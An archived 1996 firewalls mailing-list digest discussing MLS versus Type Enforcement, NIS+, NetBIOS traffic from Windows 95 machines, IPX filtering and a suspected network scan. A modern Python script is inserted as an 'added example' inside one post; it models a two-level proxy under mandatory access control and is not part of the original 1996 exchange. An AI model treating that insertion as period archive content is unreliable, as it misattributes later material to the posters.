From firewalls-owner Thu Feb 1 14:28:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03013 for firewalls-outgoing; Thu, 1 Feb 1996 14:20:19 -0800 (PST) Received: from sparc14.cs.uiuc.edu (sparc14.cs.uiuc.edu [128.174.244.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA03008 for ; Thu, 1 Feb 1996 14:20:14 -0800 (PST) Received: (from jwthomp@localhost) by sparc14.cs.uiuc.edu (8.7.3/8.7.3) id QAA01008; Thu, 1 Feb 1996 16:15:13 -0600 (CST) From: thompson jeffrey w Message-Id: <199602012215.QAA01008@sparc14.cs.uiuc.edu> Subject: Re: What are MLS and TE? To: leonard@geminisecure.com (Leonard Miyata) Date: Thu, 1 Feb 1996 16:15:12 -0600 (CST) Cc: jane@gwosi.telesc.gov.br, firewalls@GreatCircle.COM In-Reply-To: from "Leonard Miyata" at Feb 1, 96 01:18:10 pm Reply-To: jwthomp@uiuc.edu X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
> On Thu, 1 Feb 1996, Jane Ferreira Cunha wrote:
> > Please, where can I find some explanation about MLS and TE? I've seen a lot of discussion about them, but so far I could understand it. Are they in a FAQ somewhere?
> >
> > TIA,
> >
> > Jane
>
> For MLS, the official standards are Department of Defense Trusted Computer System Evaluation Criteria (TCSEC) DOD 5200.28-STD and the Trusted Network Interpretation (TNI) NCSC-TG-005. A good book for the Operating System implications is 'Building A Secure Computer System' by Morrie Gasser.
>
> For TE, the best source is probably the SCC Web site.
I > believe there is a recent article in BYTE magazine (Jan or Feb 96) > as well > I also recommend looking at the TSIG pages at http://www.sterling.com Best of luck, Jeff Thompson Jeff Thompson(jwthomp@uiuc.edu) Argus Systems Group http://www.uiuc.edu/ph/www/jwthomp - Trusted Systems Network Programmer ACM at UIUC Vice Chair / SigNET Chair Member *The Guild From firewalls-owner Thu Feb 1 14:32:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01464 for firewalls-outgoing; Thu, 1 Feb 1996 13:30:11 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA01459 for ; Thu, 1 Feb 1996 13:30:02 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id IAA24481; Fri, 2 Feb 1996 08:26:34 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id IAA17213; Fri, 2 Feb 1996 08:32:50 +1100 From: Jas (Matthew K) Message-Id: <199602012132.IAA17213@maverick.itd.uts.edu.au> Subject: Re: NIS+ To: fina@novo.dk (Finn T Andersen) Date: Fri, 2 Feb 1996 08:32:49 +1100 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9602011239.ZM14289@eagle.novo.dk> from "Finn T Andersen" at Feb 1, 96 12:39:49 pm X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) 
C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Finn T Andersen wrote this...
> There has been a lot of good information and suggestions about NIS recently, however, no one has mentioned anything about NIS+. I have heard that NIS+ should be a very secure system, but in fact I have never heard about anyone who was using it. Is it available, and on what platforms?

Yes, NIS+ is far more secure than NIS. It uses SecureRPC to form the underlying basis of its security, and uses access control lists for data in the tables (even down to individual table entries, i.e. everyone owns their own passwd entry so you can only see your own encrypted password field). It also supports network encryption of certain fields (down to individual entries within a table entry) on versions shipped within the US.

SecureRPC is based on Diffie-Hellman for key exchange, and DES for encryption/authentication. It does have time-limited credentials and most of the other good stuff, and has been around for a while. Most NFS implementations support SecureRPC as a securing method (i.e. only you can read your files, and root can only read your files while you're logged in; network traffic with secure NFS is encrypted with your key).

Last I heard NIS+ had been adopted by COSE (I could be completely wrong here), so all the COSE people should be supporting it at _some_ stage. Last I heard the only major Unix player who wasn't eventually going to start using NIS+ was SGI, but again I could be wrong. I haven't looked at the COSE side of NIS+ for over a year now.

If anyone has any deeper questions about using NIS+ as an authentication method etc. et al., ask... I administered a 6000-user site using NIS+ for almost 18 months.. now I only admin a 2000-user site :| (again using NIS+).

Matt
-- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Admin Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike
From firewalls-owner Thu Feb 1 14:53:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03898 for firewalls-outgoing; Thu, 1 Feb 1996 14:40:50 -0800 (PST) Received: from gatekeeper.qualix.com (gatekeeper.qualix.com [192.91.182.105]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03883 for ; Thu, 1 Feb 1996 14:40:44 -0800 (PST) Received: from qualix.qualix by gatekeeper.qualix.com (8.6.9/Q940531.1) id OAA05764; Thu, 1 Feb 1996 14:39:44 -0800 Received: from qualix20.qualix by qualix.qualix (4.1/SMI-4.1-Q931113.1) id AA25086; Thu, 1 Feb 96 14:39:43 PST Received: from patience5.qualix by qualix20.qualix (SMI-8.6/SMI-SVR4) id OAA11978; Thu, 1 Feb 1996 14:39:39 -0800 Received: by patience5.qualix (SMI-8.6/SMI-SVR4) id OAA05576; Thu, 1 Feb 1996 14:39:38 -0800 Date: Thu, 1 Feb 1996 14:39:38 -0800 From: hle@qualix.com (Hung Le) Message-Id: <199602012239.OAA05576@patience5.qualix> To: firewalls@greatcircle.com Subject: Re: Fault Tolerant Firewall Cc: mdr@vodka.sse.att.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: pB+8z683tZlWnKTQqyttDg== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
> I've seen configurations using dual ported SCSI that were able to get > going much faster than that.
If Machine A went down, Machine B would > take over its disk drives and start up new services. The disk > themselves were striped RAID. I think it used a heart beat to > determine when A had died. The nice part of the arrangement was that > if both machines had separate services, they could back up each > other. If memory serves, 3-5 minutes is a better figure plus a > configurable amount of time to make sure that A is indeed "down". > Sounds like Qualix SecureWatch environment. Currently, it only supports Checkpoint Firewall-1. But the environment is fairly flexible and can be made to support other firewall systems. For more information see URL: http://www.qualix.com/sysman/product/securewatch.htmld/ > I'd call this fault-resilient, not fault tolerant. But it may be > less expensive to get 2 cheap boxes than 1 expensive special purpose > fault tolerant-in-the-hardware box. > > Mark Riggins > > % --- % Hung H. Le - Qualix Group, Inc. hle@qualix.com or uunet!qualix!hle % Voice: 415.572.0200 FAX: 415.572.1300 % Qualix Group WWW server: "http://www.qualix.com" From firewalls-owner Thu Feb 1 16:08:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06892 for firewalls-outgoing; Thu, 1 Feb 1996 15:56:44 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA06879 for ; Thu, 1 Feb 1996 15:56:34 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA06419; Thu, 1 Feb 1996 17:54:52 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA06415; Thu, 1 Feb 1996 17:54:51 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id RAA16495; Thu, 1 Feb 1996 17:55:24 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id RAA16089; Thu, 1 Feb 
1996 17:55:26 -0600 Date: Thu, 1 Feb 1996 17:55:26 -0600 From: Rick Smith Message-Id: <199602012355.RAA16089@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, watt@sware.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Watt writes: >Actually, Rick, your analysis below does show a lack of >understanding in the capabilities of most MLS systems. Your >analysis assumes that the MAC labels enforced by such systems >are strictly hierarchical, e.g.: Excuse me, but I doubt you could do any of this without categories and/or compartments. I am surprised that you could infer their absence from that message. MLS couldn't come even close to competing with type enforcement if it lacked non-hierarchical labels. >Here your understanding of MLS networking breaks down. Read >the existing standards, such as RFC 1108 or the DoD's Common Security >Label spec. Naturally I've read various IPSO specs. Labeled IP is largely irrelevant to the firewalls marketplace today, and I suspect they will remain so for the next few years (perhaps an interesting topic for a different thread). We sell very, very little to sites that use labeled IP protocols. Most people need to interoperate with standard hosts operating without IPSO labels. Your subsequent comments are correct only if you are operating with labeled interfaces and you associate labels with individual services. This is, of course, an unlikely application of labels on Internet traffic. >Now I'm not an expert on Type Enforcement, but we do have a couple >of ex-SCC developers here. We've discussed the pros/cons of >TE vs. MLS at length for quite some time and have come to the conclusion >that ANYTHING that can be done with TE can also be done with MLS and >vice versa. Of course the architectures are different, and some >problems fit more naturally with one or the other approach. 
But the >capabilities are virtually identical, particularly when applied to >firewalls and similar separation problems.

The bottom line is, of course, that both are forms of mandatory access control. We all agree on that point. (Hi, Barry).

Rick. smith@sctc.com secure computing corporation
From firewalls-owner Thu Feb 1 16:09:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06489 for firewalls-outgoing; Thu, 1 Feb 1996 15:42:07 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06475 for ; Thu, 1 Feb 1996 15:41:58 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA04194; Thu, 1 Feb 96 17:37:50 CST Date: Thu, 1 Feb 96 17:37:50 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602012337.AA04194@garrison.com.> To: mdr@vodka.sse.att.com, smith@sctc.com Subject: Re: Mandatory protection (was: product selection) Cc: firewalls@greatcircle.com, jgt10@amdahl.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
> I've always recognized that MLS systems can impose mandatory protection barriers between processes by using levels, categories, and compartments, but I still concluded "No." This is based on my view of high assurance MLS obsessed with confidentiality. The argument goes as follows:
>
> 1) Typical Internet TCP/IP traffic does not contain labels.
> 2) The network interface in an MLS system is always assigned a label.
> 3) If a network interface receives a packet that does not already contain a label, then the packet must be assigned the network interface's label.
> 4) All packets sent or received as typical Internet TCP/IP traffic carry the same label (from 1, 2, 3). Call this label the "Internet Label."
> 5) If two processes have the same label, there is no way to enforce mandatory MLS protection between them.
> 6) Every network server process is assigned a label.
> 7) A network server process can only send and receive packets if the packets' labels are identical to the label of the network server process.
> 8) Any network server process that handles Internet traffic must be assigned the "Internet Label" (from 4, 7).
> 9) All Internet server processes must be assigned the "Internet Label" (from 6, 8).
> 10) You can't enforce MLS between Internet servers (from 5, 9).
>
> I suspect our misunderstandings are tied to statement 3) above. On Sidewinder we can associate TCP/IP port numbers with separately labeled domains in the TE system. The only way you can get a similar result in an MLS system is to associate TCP/IP port numbers with MLS confidentiality labels. For example, the B1 system might define a category or compartment label for "Mail" and restrict Port 25 traffic to processes with the Mail label. If so, this changes how statement 3) is phrased, and completely changes the conclusion.
>
> The problem is, you can't assign MLS labels that way if you're obsessed with confidentiality. I can think of three reasons immediately as to why not:
>

I would propose a different use for the MLS architecture.

outside---o.proxies----i.proxies-----inside

o.proxies have level of '1'. i.proxies have level of '2'. o.proxies do not have access to write to the inside ethernet interface. i.proxies have privilege to read o.proxies based on label being dominant.

From what I see, this would make a connection-based attack useless. You could break into the firewall and subvert the o.proxies. Data-based attacks could potentially succeed if neither proxy noticed the signature. Connection-based attacks would be limited to harming the level '1' environment.

I would be interested in hearing comments...

Jeromie Jackson Garrison Associates jeromie@garrison.com

p.s. I do not know if any firewalls implement this type of model/theory, but it seems theoretically sound from the few mind blips I've had.
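As an added example (not part of Jeromie Jackson's post, and not the behaviour of any product named in this thread), the following Python script models the two-level proxy layout above as a tiny reference monitor and walks three paths through it: an inbound connection, the reply traffic, and what a subverted o.proxies can attempt. It assumes Bell-LaPadula simple security for reads (a subject may read objects at or below its level) and the strict form of the *-property for writes (a subject may write only at exactly its own level). That second assumption matters: the post's rule that o.proxies cannot write to the inside interface is not implied by dominance alone, because the ordinary *-property lets a level-1 subject write up into a level-2 object. The names and levels are taken from the post; giving each network interface the label of the proxy tier that serves it is an assumption.

```python
"""Toy reference monitor for the two-level proxy layout proposed above.

Added example, not code from the original post. Labels are plain integers:
level 1 for the outside interface and o.proxies, level 2 for i.proxies and
the inside interface (assumption: each interface carries the label of the
proxy tier that serves it).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Labeled:
    """A subject or object with a single hierarchical MLS level."""
    name: str
    level: int


OUTSIDE = Labeled("outside.if", 1)
O_PROXY = Labeled("o.proxies", 1)
I_PROXY = Labeled("i.proxies", 2)
INSIDE = Labeled("inside.if", 2)


def decide(subject: Labeled, op: str, obj: Labeled) -> bool:
    """Mandatory check only: no discretionary bits, no privilege override.

    read : Bell-LaPadula simple security, the subject must dominate the object.
    write: strict *-property, subject and object must be at the same level.
           (The ordinary *-property would let level 1 write up into level 2,
           which is exactly what the proposal wants to forbid.)
    """
    if op == "read":
        return subject.level >= obj.level
    if op == "write":
        return subject.level == obj.level
    raise ValueError(f"unknown operation {op!r}")


# Inbound connection: outside wire -> o.proxies -> i.proxies -> inside wire.
INBOUND = [
    (O_PROXY, "read", OUTSIDE),
    (I_PROXY, "read", O_PROXY),    # i.proxies reads down, as the post describes
    (I_PROXY, "write", INSIDE),
]

# Reply traffic must go the other way: inside -> i.proxies -> o.proxies -> outside.
OUTBOUND = [
    (I_PROXY, "read", INSIDE),
    (I_PROXY, "write", O_PROXY),   # write down: the strict *-property denies this
    (O_PROXY, "write", OUTSIDE),
]

# What a subverted o.proxies can try after a connection-based break-in.
ATTACKS = [
    (O_PROXY, "write", INSIDE),    # reach the inside wire directly
    (O_PROXY, "read", I_PROXY),    # read up into the level-2 proxy
    (O_PROXY, "read", INSIDE),
    (O_PROXY, "write", OUTSIDE),   # still allowed: level 1 is its own level
]


def trace(path):
    """Evaluate every step of a path; returns (subject, op, object, allowed)."""
    return [(s.name, op, o.name, decide(s, op, o)) for s, op, o in path]


def denied(path):
    """Only the steps the monitor refuses, as (subject, op, object)."""
    return [(s, op, o) for s, op, o, ok in trace(path) if not ok]


if __name__ == "__main__":
    for label, path in (("inbound", INBOUND), ("reply", OUTBOUND), ("attacker", ATTACKS)):
        print(f"--- {label}")
        for s, op, o, ok in trace(path):
            print(f"{'ALLOW' if ok else 'DENY ':5} {s} {op} {o}")
```

Run stand-alone it prints every decision. The inbound path is clean and a subverted o.proxies is confined to level 1, which is the property the post is after. The reply path is where the model needs more than labels: with the rules as stated, i.proxies may not write down to o.proxies, so return traffic needs a trusted downgrader that sits outside the mandatory policy, and that is the point at which the confidentiality-only reading of MLS discussed earlier in this thread starts to bite.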
From firewalls-owner Thu Feb 1 16:27:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07380 for firewalls-outgoing; Thu, 1 Feb 1996 16:07:47 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA07366 for ; Thu, 1 Feb 1996 16:07:41 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id SAA06751; Thu, 1 Feb 1996 18:06:40 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id SAA06747; Thu, 1 Feb 1996 18:06:40 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id SAA16728; Thu, 1 Feb 1996 18:07:14 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id SAA16504; Thu, 1 Feb 1996 18:07:15 -0600 Date: Thu, 1 Feb 1996 18:07:15 -0600 From: Rick Smith Message-Id: <199602020007.SAA16504@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, t-jont@microsoft.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jonathon Tidswell asks about some things, and I'll comment on the ones not already answered: >- TE is a MAC mechanism for providing least privilege Actually, it provides access control with respect to read, write, and execute so you have pretty fine control over what code gets executed when handling which data. This makes it easy to enforce integrity constraints on what is done to various data items. You can pretty much implement the Clark-Wilson integrity model with the mechanism. It also provides least privilege as a side effect. >Is there a common model or mechanism (other than TE) for least privilege in >B2 (and above) systems ? 
The only other one I've heard anything about is the integrity mechanism used in the old Honeywell SCOMP and probably in the HFSI/Wang XTS200 and 300 (Karen?). The mechanism is based on the Biba integrity model. There aren't that many B2/B3/A1 systems out there, so there aren't too many implemented alternatives. Rick. smith@sctc.com secure computing corporation From firewalls-owner Thu Feb 1 19:08:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA14194 for firewalls-outgoing; Thu, 1 Feb 1996 18:59:01 -0800 (PST) Received: from crl.crl.com (crl.com [165.113.1.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA14188 for ; Thu, 1 Feb 1996 18:58:57 -0800 (PST) Received: by crl.crl.com id AA09605 (5.65c/IDA-1.5); Thu, 1 Feb 1996 18:46:58 -0800 Date: Thu, 1 Feb 1996 18:46:57 -0800 (PST) From: Tim Keanini To: Sick Puppy Cc: firewalls@GreatCircle.com Subject: Re: Windows 95 clobbering firewall? In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 1 Feb 1996, Sick Puppy wrote: > (Subject: Sick Puppy struggles to appear legitimate) > > I have a couple of sniffers in a network, one just inside the firewall > and the other right next to the network management system. > The last time I looked at these was about six weeks ago and when > looking today I see something new. > > The DNS running in the firewall used to get about 10 connects every 12 > hours from the company's internal mail system but now the firewall DNS is > getting about 10,800 connects every day from the network management > system (NMS). The sniffer watching the NMS shows that new Windows > 95 machines are connecting to it with NetBios on port 137, NetBios Name > Service. It looks like the NMS box in turn queries the firewall. 
>
> The firewall itself seems to be a Pentium machine, handling about 4,000
> incoming messages per day, 3,000 outgoing messages per day and a web user
> population of about 150 users.
>
> Two questions:
> 1) will the increased DNS queries cause the firewall performance
> (throughput/response time) to drop;
> 2) has anyone else seen a similar situation;
> 3) how would you stop these evil little Windows 95 weevils from
> nibbling away at the firewall DNS?

If you can afford to, you can configure the IP stack on the WIN95 (NT has the same problems out of the box) so that these NetBios services will not go anywhere near TCP/IP. I will leave this as an exercise to the reader, but I will hint that it has to deal with BIND'ing in the CONTROL PANEL:NETWORKS and that if NETBIOS is BIND'ing to another protocol and then that protocol is anywhere near your TCP/IP settings, you have a transitive tunnel of NetBios tunneled in TCP/IP. Weak!

I don't claim to be a WIN95/NT expert but I do manage a lot of firewalls and have seen this from the first betas of WIN95.
:-)

--blast

From firewalls-owner Thu Feb 1 19:53:31 1996
Date: Thu, 1 Feb 1996 22:41:30 -0500
From: wojtek@solaris.tryc.on.ca (Wojciech Tryc)
Message-Id: <9602020341.AA05704@tryc.on.ca>
To: firewalls@GreatCircle.COM
Subject: HyperNews

I have created a HyperNews discussion about firewalls.
Please feel free to join: http://www.tryc.on.ca/HyperNews/get/forums/firewalls.html

Sincerely,
Wojciech Tryc

From firewalls-owner Thu Feb 1 20:21:12 1996
Date: Fri, 02 Feb 96 09:23:00 PST
From: Prakash N Purushotham
Message-ID: <31124A6A@gangotri.mindware.soft.net>
To: "'firewalls@greatcircle.com'"
Subject: X#.hosts in /etc directory

Hi

Yesterday when I was backing up my DNS databases and Mail databases, I found several instances of files with names X0.hosts, X1.hosts .... X7.hosts. All these files were created on 27 Jan, 1996 (Saturday, a non-working day) with nearly the same time-stamps. Could this mean that my network is under attack? I did not find anything suspicious in the syslog and sulog files.
Request Experts to comment.

TIA
Prakash
prakashp@mindware.soft.net

From firewalls-owner Thu Feb 1 20:38:30 1996
Date: Thu, 1 Feb 1996 22:33:16 -0600
From: "Elbert LaGrew"
Organization: Minnesota Dept. of Health
Message-Id: <9602020432.AB29764@sunny.health.state.mn.us>
To: Firewalls@GreatCircle.COM
Reply-To: elbert.lagrew@sunny.health.state.mn.us
Subject: Internet-access from Novell (reply)

>From: bressen@hks.net[SMTP:bressen@hks.net]
>Here's the worse problem I mentioned.
>
>I've grepped over 9000 archived articles of this group
>and found no mention of how to firewall novell boxes from
>each other.

[stuff deleted]

>How do I protect said client from, say, a disgruntled mailroom
>employee at the provider end, bent on hacking on the clients network?

[stuff deleted]

>Are there any IPX/SPX packet filters available?
>
>Are there any IPX proxy server firewalls available?

>Of course I'll start by recommending that the market data feed
>box go onto its own ethernet segment, and that IP traffic is
>not forwarded on or off of that segment.

Well, one of the simplest ways of isolating Netware LANs is through a router. On a Cisco, this is as simple as applying an access-list to the ethernet or serial port allowing or denying IPX traffic.
If the Netware server is set up for TCP/IP, again, a simple access-list will do. Since Netware does all of its work using IPX/SPX, one need not worry too much about TCP/IP traffic unless the server is running something like Netware IP or FlexIP, which acts like a software bridge and encapsulates IPX/SPX in IP traffic. SAP traffic can also be blocked in this manner.

Of course, this is not to take the place of a vigilant and thoughtful network administrator, who must make sure that passwords are changed, rights are secure, and that things are as they should be.

For a good overview on SAPs and IPX access-lists, see documentation at http://www.cisco.com. There are others, but they don't come to mind right now.

HTH
El

From firewalls-owner Thu Feb 1 21:38:25 1996
Date: Fri, 2 Feb 96 00:30 EST
From: Barney Wolff
Message-ID: <9602020030.AA13691@databus.databus.com>
To: firewalls@GreatCircle.com
Subject: Re: Windows 95 clobbering firewall?

>Date: Thu, 1 Feb 1996 13:53:21 -0500 (EST)
>From: Sick Puppy
>
>The DNS running in the firewall used to get about 10 connects every 12
>hours from the company's internal mail system but now the firewall DNS is
>getting about 10,800 connects every day from the network management
>system (NMS). The sniffer watching the NMS shows that new Windows
>95 machines are connecting to it with NetBios on port 137, NetBios Name
>Service. It looks like the NMS box in turn queries the firewall.
>
> 2) has anyone else seen a similar situation;

Win95 (and NT) send subnet broadcasts on UDP port 137.
They may send unicasts to any host they have noticed. The broadcasts are how the "network neighborhood" folder gets populated. I have seen NT sending the subnet broadcast over a PPP link, which I thought really tacky. That was cured by turning off the "netbios helper" in NT (anecdotal).

> 3) how would you stop these evil little Windows 95 weevils from
> nibbling away at the firewall DNS?

Well, you could turn off netbios on the Win machines. Alternatively, you could stick a router between them and the NMS, which should isolate the NMS from the subnet broadcasts. That may or may not help, if the NMS is pinging the Win machines. I have a feeling that they're set up to try to talk to any IP address they notice. And if all else fails, run a caching-only name server on the NMS, so it doesn't have to bother the firewall every time. But really, named is pretty efficient, and 10K queries a day isn't anything to worry about.

Barney Wolff

From firewalls-owner Thu Feb 1 21:53:26 1996
Date: Fri, 2 Feb 1996 00:30:28 -0500
From: "Russ.Cooper@RC.Toronto.on.ca"
Message-ID: <01BAF105.A7FE47A0@RWCooper.RC.Toronto.ON.CA>
To: "'Firewalls'"
Subject: FW: Windows 95 clobbering firewall?

Install a Windows NT server and run WINS on it.
Then point all your Windows '95 machines to the NT box as their primary WINS server and they should stop broadcasting for DNS resolution of NetBios names (or so goes the theory, haven't sniffed the difference myself).

Basically, the Win95 machines are attempting to use their DNS connection via IP to resolve NetBios names. It would sound like they are running IP only. If you installed NetBeui in addition to IP, that would also resolve the DNS problems as they would use NetBeui internally first, then go to IP if the name couldn't be resolved via NetBeui. Same holds true if you put IPX in addition to IP, but IPX has more potential security risks than a non-routable protocol like NetBeui. If you have more than one protocol installed on the machine, make sure that IP is not set as the "default" protocol.

As should be abundantly clear by now, what Microsoft knows about IP my fish forget over dinner. A WINS server is designed to help clean up the mess left by non-NT MS machines working with IP.

Let me know how it goes.
Cheers,
Russ Cooper, Senior Consultant - Internet
SHL/Computer Innovations - Consulting Services
Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com
"can someone tell me where to go today to get the money to go to where I want to go today"

From firewalls-owner Fri Feb 2 00:38:27 1996
Date: Fri, 02 Feb 96 08:34:44 GMT
From: "MCARDLE MARK"
Message-Id: <9601028232.AA823279053@dis.n-i.nhs.uk>
To: les@tracker.demon.co.uk, firewalls@greatcircle.com
Subject: Re[2]: firewall

Thanks for the reply, Les.

My organisation provides IT infrastructure support and management to nearly 40 Health Service trusts. The DEC firewall is used to secure our point of access to the Internet; however, we may wish to implement packet filtering/logging between various LANs on our wide area network. We have Cray Enterprise routers which can provide packet filtering but no logging facility. The Digital screend program provides both packet filtering and logging. We aim to keep our Digital firewall (mainly to protect the Internet/WAN point of access) but also want to look at ways of securing individual LANs within our WAN. Something like screend or its functional equivalent running on a PC/Workstation might satisfy this requirement.

regards
mark...
______________________________ Reply Separator _________________________________
Subject: Re: firewall
Author: les@tracker.demon.co.uk at INTERNET_MAIL_GATEWAY
Date: 02/02/96 02:02

Hi Mark,

On Thu, 01 Feb 96 08:33:08 GMT, you wrote:

>Does anyone know of a version of screend that runs on either DGUX, AIX,
>HPUX or LINUX. We are currently using a Digital Firewall and are looking at
>the DGUX DSO containment firewall.

I think TIS Gauntlet and Raptor's Eagle run on AIX, and HP. Eagle runs on DGUX (intel) as well. Are you looking for a packet filter (like DEC's) or an application gateway? Why are you looking to change your firewall?

Cheers
...Les...

+-----------------------------------------------+
| Les Carleton, Firewalling Consultant / "The Software Lifeguard"
| These are my views ... not my employer's / les@tracker.demon.co.uk
+-----------------------------------------------+
"Open Standards ... Free Software ... Live Free or Fry!"

From firewalls-owner Fri Feb 2 05:30:41 1996
Date: Fri, 2 Feb 96 13:10:01 GMT
From: jon@london.hcsc.com (Jon Shallow)
Message-Id: <9602021310.AA16539@london.csd.harris.com>
To: firewalls@GreatCircle.COM
Subject: Re: Most Secure Unix?
In-Reply-To: from "Leroy Lacy" at Feb 1, 96 9:14 am

>
> Ian:
>
> well they are good products. The problem is that the systems are just
> TCP/IP firewalls and cost an arm and a leg.
> Most of the night hawks
> come in for around 100K.
>
> If we compete with them, we'll always have a good margin.
>
> Leroy
>

Leroy,

I suspect that this was sent to firewalls in error, but some confusion needs to be cleared up now that it has. The Harris Night Hawk is a symmetric multiple processing computer, the price varying according to configuration. The CyberGuard (Harris' firewall product) comes in for considerably less than 100K.

Regards
Jon
--
Jon Shallow, Harris Computer Systems Corporation
Jon.Shallow@mail.hcsc.com
Tel +44 (0) 1276 686886  Fax +44 (0) 1276 678733

From firewalls-owner Fri Feb 2 05:38:28 1996
Date: Fri, 02 Feb 96 06:42:40 CST
From: Mark_W_Loveless@smtp.bnr.com
Message-Id: <9601028232.AA823273660@smtp.bnr.com>
To: firewalls@greatcircle.com, netmgr02@cbe.ab.ca (Glen Larwill)
Subject: Re: Scanning from afar...

My first inclination is to say this is a web robot, a spider designed to locate web servers and then index their pages. Unless it grabbed stuff out of someone's table, I would think the IP scanning would be sequential. But I really suspect a spider. If it is home grown, that is what it is based off of. Do you have any web servers?
I'd make sure your robots.txt file is configured the way you want it -- you don't want a robot to index /etc/passwd and stick it out on a search engine server or something goofy like that ;-)

Mark_W_Loveless@smtp.bnr.com

______________________________ Reply Separator _________________________________
Subject: Scanning from afar...
Author: netmgr02@cbe.ab.ca (Glen Larwill) at internet
Date: 2/1/96 2:42 PM

Has anyone seen this type of network scanning before? Addresses have been changed to protect the innocent and the guilty.

Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39620) -> X.X.211.227(80), 1 packet
Jan 30 11:14:42.962: %SEC-6-IPACCESSLOGP: list 111 denied tcp X.X.143.14(39621) -> X.X.211.243(80), 1 packet

From firewalls-owner Fri Feb 2 05:53:57 1996
Date: Fri, 02 Feb 96 06:47:10 CST
From: Mark_W_Loveless@smtp.bnr.com
Message-Id: <9601028232.AA823273665@smtp.bnr.com>
To: firewalls@GreatCircle.com, Sick Puppy
Subject: Re: Windows 95 clobbering firewall?

Look at how Netbios is configured on the Win95 boxes. It is probably tied to IP. I do not know how to unconfigure it, but I worked with someone after seeing this exact problem and they corrected it by unbinding Netbios from IP.

Mark_W_Loveless@smtp.bnr.com

______________________________ Reply Separator _________________________________
Subject: Windows 95 clobbering firewall?
Author: Sick Puppy at internet
Date: 2/1/96 8:10 PM

